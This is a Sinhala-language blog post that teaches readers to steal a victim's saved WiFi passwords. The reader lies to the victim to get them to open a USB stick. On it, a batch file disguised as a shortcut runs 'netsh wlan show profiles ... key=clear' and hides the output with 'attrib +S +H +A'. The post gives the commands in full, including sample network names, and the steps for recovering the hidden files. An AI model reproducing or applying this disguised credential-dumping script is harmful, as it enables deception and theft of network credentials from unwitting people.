Monday, April 17, 2017

USB එකෙන් WIFI Password හොරකම් කරමු !




/hihi කොහොමද ඉතින් යාලුවනේ. අවුරුදු ජය ඇති නේද? ඔන්න එහෙනම් ඉතින් අවුරුදු වැඩ කටයුතු අඩු වුන නිසා මම ගෙනාව එල පෝස්ට් එකක්. ඇත්තම කියනවනම් මම මගේ දැනුමින්ම දෙන post එකක් තමයි මේක. ඒ කිව්වෙ අනික් දේවල් මම තනියම ඉගෙනගත්ත දේවල් නෙවෙයි. Internet එකෙන් දැන ගත්ත දේවල්. අද කියල දෙන්නෙ WIFI Password උස්සන්න පුලුවන් පොඩි soft එකක් හදන හැටි.


ඇත්තම කියනවනම් මේකෙන් වෙන්නෙ computer එකේ save වෙලා තියෙන wifi password එක text file එකකට copy කරන එක. හැබැයි ඉතින් ඔය file එක අහු වෙන හින්ද hide කරන්නත් පොඩි code එකක් දාල තියෙන්නෙ.

වැඩේ පටන් ගන්න ඉස්සෙල්ල ඔයාට පොඩි වැඩක් කරන්න වෙනව. ඒ තමයි මෙන්න මේ file එක මුලින්ම ඔයාට hack කරන්න ඕන WIFI තියෙන කෙනාට මොකක් හරි බොරුවක් ගහල දෙන්න. ඊට පස්සෙ එකෙන් පොඩි file එකක් හැදෙයි ඒ computer එකේ තියෙන ඔක්කොම WIFI service වල. මේක හදන්නෙ මෙහෙමයි.

මුලින්ම මේ code එක notepad එකට දාගන්න. ඊට පස්සෙ app1.cmd කියල save කරගෙන USB එකට දාගන්න. ඊට පස්සෙ ඒ USB එක අර WIFI තියෙන කෙනාට දෙන්න මොකක් හරි කියල. අපේ කට්ටිය ඉතින් කොහොමත් බොරු කියල කප් ගහපු අයනේ....! :D

(අවශ්‍ය code ටික මෙතනින් copy කරගන්න.)

netsh wlan show profiles>E:/file.txt
attrib +S +H +A E:/file.txt

ඔය  E:/file.txt කියන තැන් දෙකේ E කියන තැනට ඔයාගෙ USB එකේ drive letter එක දාන්න. දැන් ඕකෙ shortcut එකක් හදල ඒකට මොකක් හරි හොඳ නමකුයි icon එකකුයි දාන්න. දැන් අර original file එක hide කරන්න.

දැන් ඉතින් අර කෙනා ඔය file එක open කරයි. මොකුත් පේන එකක් නම් නෑ. දැන් ඉතින් ඔයාගෙ වාරෙ. ඔය usb එක computer එකට ගහල cmd එක open කරන්න. දැන් මෙන්න මේ command එක ඒකෙ ගහන්න.

attrib -S -H -A E:/file.txt

E:/ කියන තැනට ඔයාගෙ usb එකේ letter එක දාන්න. දැන් enter ඔබන්න. ඔයාට දැන් file කියල එකක් පෙනෙයි. ඒකෙ තමයි අරයගෙ ඔක්කොම WIFI Interfaces ටික තියෙන්නෙ.



දැන් තමයි වැඩේ පටන් ගන්නෙ.මෙන්න මේ code එක notepad එකේ save කරල USB එකට දාගන්න.

netsh wlan show profiles PROLINK_H5004NK_784FE key=clear>test.txt
netsh wlan show profiles Xperia M2_884f key=clear>test1.txt
netsh wlan show profiles IT Solution key=clear>test2.txt
attrib +S +H +A E:/test.txt
attrib +S +H +A E:/test1.txt
attrib +S +H +A E:/test2.txt

සමහර විට WIFI Interface දෙක තුනක් තියෙන්න පුලුවන්. ඒ හැම එකක්ම code එකට දාන්න. මම ඔය දාල තියෙන්නෙ මගේ computer එකේ තියෙන ටික. ඒ හැම එකටම .txt file එකක් දාන්න ඕනෙ.



දැන් ඉතින් මේකෙ shortcut එකක් හදල හොඳ නමක්, icon එකක් දාල original file එක hide කරන්න. මේක open කරහම WIFI Interface වල ඔක්කොම විස්තර file එකට copy වෙනව. ඒ ඔක්කොම hide වෙලා තියෙන්නෙ. බලන්න ඕනෙ නම් cmd එකේ මෙන්න මේ code එක ගහල enter කරන්න.



මට එහෙම කරහම ආව මෙහෙම එකක්. ඒකෙ Key Content කියන තැන තමයි password එක තියෙන්නෙ.



ඔන්න ඔහොමයි ඉතින් USB එකෙන් කාව හරි මෝඩයට අන්දල WIFI Password එක උස්සන්නෙ. මේකෙ සමහර තැන් ඔයගොල්ලන්ට අපැහැදිලි ඇති. එහෙම මොකක් හරි ප්‍රශ්නයක් තියෙනවනම්, වැඩ කරන්නෙ නැත්නම් comment එකකින් හරි mail එකකින් හරි මගෙන් අහන්න. මම මේකට තව එක එක කෑලි බෑලි ටිකක් දාල පස්සෙ හදල ඔයගොල්ලන්ට දෙන්නම්.

ආයෙත් ඉතින් හොඳ post එකකින් හම්බවෙමු. ඔයාල හැමෝටම සුබ දවසක් !
/bye

No comments:

Post a Comment